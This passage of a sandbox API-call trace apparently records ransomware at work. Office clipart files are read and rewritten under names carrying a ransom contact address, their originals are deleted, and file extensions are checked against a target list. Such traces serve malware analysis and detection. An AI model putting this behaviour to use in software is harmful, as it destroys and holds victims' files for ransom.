lpNumberOfBytesRead=0x2a8fecc*=0x5314, lpOverlapped=0x0) returned 1 [0069.132] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x5320, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x5320, lpOverlapped=0x0) returned 1 [0069.133] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.133] WriteFile (in: hFile=0x3a0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.133] SetEndOfFile (hFile=0x3a0) returned 1 [0069.137] CloseHandle (hObject=0x3a0) returned 1 [0069.154] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.154] SetEndOfFile (hFile=0x384) returned 1 [0069.155] CloseHandle (hObject=0x384) returned 1 [0069.155] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf")) returned 1 [0069.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 68 [0069.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 68 [0069.155] lstrlenW (lpString=".doc") returned 4 [0069.156] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.156] lstrlenW (lpString=".docx") returned 5 [0069.156] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0069.156] lstrlenW (lpString=".pdf") returned 4 [0069.156] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.156] lstrlenW (lpString=".xls") returned 4 [0069.156] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.156] lstrlenW (lpString=".xlsx") returned 5 [0069.156] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0069.156] lstrlenW (lpString=".ppt") returned 4 [0069.156] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 68 [0069.156] lstrlenW (lpString=".zip") returned 4 [0069.156] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.156] lstrlenW (lpString=".rar") returned 4 [0069.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.156] lstrlenW (lpString=".bz2") returned 4 [0069.156] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.156] lstrlenW (lpString=".7z") returned 3 [0069.156] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 68 [0069.156] lstrlenW (lpString=".dbf") returned 4 [0069.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 68 [0069.156] lstrlenW (lpString=".1cd") returned 4 [0069.156] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF") returned 68 [0069.156] lstrlenW (lpString=".jpg") returned 4 [0069.156] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.157] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.157] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0069.158] GetLastError () returned 0x0 [0069.158] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x5b0, lpOverlapped=0x0) returned 1 [0069.186] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x5c0, lpOverlapped=0x0) returned 1 [0069.186] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.186] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.186] SetEndOfFile (hFile=0x340) returned 1 [0069.187] CloseHandle (hObject=0x340) returned 1 [0069.187] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.187] SetEndOfFile (hFile=0x384) returned 1 [0069.187] CloseHandle (hObject=0x384) returned 1 [0069.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.188] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090779.wmf")) returned 1 [0069.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 68 [0069.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 68 [0069.188] lstrlenW (lpString=".doc") returned 4 [0069.188] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.188] lstrlenW (lpString=".docx") returned 5 [0069.188] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0069.188] lstrlenW (lpString=".pdf") returned 4 [0069.188] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.188] lstrlenW (lpString=".xls") returned 4 [0069.188] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.188] lstrlenW (lpString=".xlsx") returned 5 [0069.188] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0069.188] lstrlenW (lpString=".ppt") returned 4 [0069.188] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 68 [0069.188] lstrlenW (lpString=".zip") returned 4 [0069.188] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.188] lstrlenW (lpString=".rar") returned 4 [0069.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.189] lstrlenW (lpString=".bz2") returned 4 [0069.189] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.189] lstrlenW (lpString=".7z") returned 3 [0069.189] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 68 [0069.189] lstrlenW (lpString=".dbf") returned 4 [0069.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 68 [0069.189] lstrlenW (lpString=".1cd") returned 4 [0069.189] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF") returned 68 [0069.189] lstrlenW (lpString=".jpg") returned 4 [0069.189] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.189] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.189] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0069.190] GetLastError () returned 0x0 [0069.190] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa442, lpOverlapped=0x0) returned 1 [0069.203] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa450, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa450, lpOverlapped=0x0) returned 1 [0069.204] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.204] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.204] SetEndOfFile (hFile=0x340) returned 1 [0069.204] CloseHandle (hObject=0x340) returned 1 [0069.204] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.204] SetEndOfFile (hFile=0x384) returned 1 [0069.205] CloseHandle (hObject=0x384) returned 1 [0069.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0093905.wmf")) returned 1 [0069.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 68 [0069.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 68 [0069.207] lstrlenW (lpString=".doc") returned 4 [0069.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.207] lstrlenW (lpString=".docx") returned 5 [0069.207] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0069.207] lstrlenW (lpString=".pdf") returned 4 [0069.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.207] lstrlenW (lpString=".xls") returned 4 [0069.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.207] lstrlenW (lpString=".xlsx") returned 5 [0069.207] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0069.207] lstrlenW (lpString=".ppt") returned 4 [0069.207] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 68 [0069.208] lstrlenW (lpString=".zip") returned 4 [0069.208] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.208] lstrlenW (lpString=".rar") returned 4 [0069.208] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.208] lstrlenW (lpString=".bz2") returned 4 [0069.208] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.208] lstrlenW (lpString=".7z") returned 3 [0069.208] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 68 [0069.208] lstrlenW (lpString=".dbf") returned 4 [0069.208] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 68 [0069.208] lstrlenW (lpString=".1cd") returned 4 [0069.208] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0093905.WMF") returned 68 [0069.208] lstrlenW (lpString=".jpg") returned 4 [0069.208] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.209] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.209] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.211] GetLastError () returned 0x0 [0069.211] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x40d4, lpOverlapped=0x0) returned 1 [0069.237] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x40e0, lpOverlapped=0x0) returned 1 [0069.238] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.238] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.238] SetEndOfFile (hFile=0x370) returned 1 [0069.238] CloseHandle (hObject=0x370) returned 1 [0069.238] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.238] SetEndOfFile (hFile=0x340) returned 1 [0069.239] CloseHandle (hObject=0x340) returned 1 [0069.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf")) returned 1 [0069.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 68 [0069.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 68 [0069.240] lstrlenW (lpString=".doc") returned 4 [0069.240] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.240] lstrlenW (lpString=".docx") returned 5 [0069.240] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0069.240] lstrlenW (lpString=".pdf") returned 4 [0069.240] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.240] lstrlenW (lpString=".xls") returned 4 [0069.240] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.240] lstrlenW (lpString=".xlsx") returned 5 [0069.240] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0069.240] lstrlenW (lpString=".ppt") returned 4 [0069.241] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 68 [0069.241] lstrlenW (lpString=".zip") returned 4 [0069.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.241] lstrlenW (lpString=".rar") returned 4 [0069.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.241] lstrlenW (lpString=".bz2") returned 4 [0069.241] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.241] lstrlenW (lpString=".7z") returned 3 [0069.241] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 68 [0069.241] lstrlenW (lpString=".dbf") returned 4 [0069.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 68 [0069.241] lstrlenW (lpString=".1cd") returned 4 [0069.241] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF") returned 68 [0069.241] lstrlenW (lpString=".jpg") returned 4 [0069.241] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.246] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.246] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.249] GetLastError () returned 0x0 [0069.249] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x65e6, lpOverlapped=0x0) returned 1 [0069.253] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x65f0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x65f0, lpOverlapped=0x0) returned 1 [0069.254] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.254] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.254] SetEndOfFile (hFile=0x38c) returned 1 [0069.254] CloseHandle (hObject=0x38c) returned 1 [0069.255] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.255] SetEndOfFile (hFile=0x384) returned 1 [0069.255] CloseHandle (hObject=0x384) returned 1 [0069.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.256] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099151.wmf")) returned 1 [0069.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 68 [0069.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 68 [0069.256] lstrlenW (lpString=".doc") returned 4 [0069.256] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.256] lstrlenW (lpString=".docx") returned 5 [0069.256] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0069.256] lstrlenW (lpString=".pdf") returned 4 [0069.256] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.256] lstrlenW (lpString=".xls") returned 4 [0069.256] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.256] lstrlenW (lpString=".xlsx") returned 5 [0069.256] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0069.256] lstrlenW (lpString=".ppt") returned 4 [0069.256] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 68 [0069.256] lstrlenW (lpString=".zip") returned 4 [0069.256] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.256] lstrlenW (lpString=".rar") returned 4 [0069.256] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.256] lstrlenW (lpString=".bz2") returned 4 [0069.256] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.257] lstrlenW (lpString=".7z") returned 3 [0069.257] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 68 [0069.257] lstrlenW (lpString=".dbf") returned 4 [0069.257] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 68 [0069.257] lstrlenW (lpString=".1cd") returned 4 [0069.257] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099151.WMF") returned 68 [0069.257] lstrlenW (lpString=".jpg") returned 4 [0069.257] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.257] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.257] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.257] GetLastError () returned 0x0 [0069.257] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x3632, lpOverlapped=0x0) returned 1 [0069.267] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x3640, lpOverlapped=0x0) returned 1 [0069.268] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.268] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.269] SetEndOfFile (hFile=0x38c) returned 1 [0069.269] CloseHandle (hObject=0x38c) returned 1 [0069.269] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.269] SetEndOfFile (hFile=0x384) returned 1 [0069.269] CloseHandle (hObject=0x384) returned 1 [0069.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.270] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099153.wmf")) returned 1 [0069.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 68 [0069.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 68 [0069.270] lstrlenW (lpString=".doc") returned 4 [0069.270] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 